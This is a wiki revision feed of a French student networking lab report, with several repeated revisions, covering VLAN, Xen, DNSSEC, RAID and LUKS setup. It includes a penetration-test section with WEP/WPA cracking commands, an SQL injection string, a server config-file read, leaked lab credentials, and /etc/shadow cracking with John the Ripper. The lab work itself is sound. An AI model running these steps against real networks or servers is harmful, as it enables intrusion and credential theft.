 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
=== WPA ===&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur &amp;quot;' or 1=1; --&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.&lt;br /&gt;
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.&amp;lt;br/&amp;gt;&lt;br /&gt;
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
2. PHPMyAdmin&lt;br /&gt;
&lt;br /&gt;
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19&lt;br /&gt;
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword &lt;br /&gt;
&lt;br /&gt;
3. Récupération de fichiers avec l'user rex&lt;br /&gt;
&lt;br /&gt;
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons lancé la commande :&lt;br /&gt;
 unshadow /etc/passwd /etc/shadow | head -1 &amp;gt; mdp&lt;br /&gt;
Nous avons obtenu un fichier avec le mot de passe root haché.&lt;br /&gt;
&lt;br /&gt;
5. Decryptage du mot de passe root avec John the Ripper&lt;br /&gt;
&lt;br /&gt;
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : &amp;quot;mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons créé un dictionnaire de mots de 4 lettres : &lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dict&lt;br /&gt;
&lt;br /&gt;
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : &lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
La dernière étape consistait à lancer JtR :&lt;br /&gt;
 john -w:dict mdp&lt;br /&gt;
Après 5 minutes d'attente, le mot de passe vu cracké.&amp;lt;br/&amp;gt;&lt;br /&gt;
Avec la commande : &lt;br /&gt;
 john --show mdp&lt;br /&gt;
On obtient le mot de passe : '''fortfort'''.&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57780</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57780"/>
				<updated>2022-01-10T17:39:12Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Intrusion sur un serveur d’application Web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
=== WPA ===&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
=== Intrusion serveur WEB ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur &amp;quot;' or 1=1; --&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.&lt;br /&gt;
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.&amp;lt;br/&amp;gt;&lt;br /&gt;
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
2. PHPMyAdmin&lt;br /&gt;
&lt;br /&gt;
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19&lt;br /&gt;
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword &lt;br /&gt;
&lt;br /&gt;
3. Récupération de fichiers avec l'user rex&lt;br /&gt;
&lt;br /&gt;
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons lancé la commande :&lt;br /&gt;
 unshadow /etc/passwd /etc/shadow | head -1 &amp;gt; mdp&lt;br /&gt;
Nous avons obtenu un fichier avec le mot de passe root haché.&lt;br /&gt;
&lt;br /&gt;
5. Decryptage du mot de passe root avec John the Ripper&lt;br /&gt;
&lt;br /&gt;
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : &amp;quot;mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons créé un dictionnaire de mots de 4 lettres : &lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dict&lt;br /&gt;
&lt;br /&gt;
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : &lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
La dernière étape consistait à lancer JtR :&lt;br /&gt;
 john -w:dict mdp&lt;br /&gt;
Après 5 minutes d'attente, le mot de passe vu cracké.&amp;lt;br/&amp;gt;&lt;br /&gt;
Avec la commande : &lt;br /&gt;
 john --show mdp&lt;br /&gt;
On obtient le mot de passe : '''fortfort'''.&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57777</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57777"/>
				<updated>2022-01-10T17:38:37Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Tests d’intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
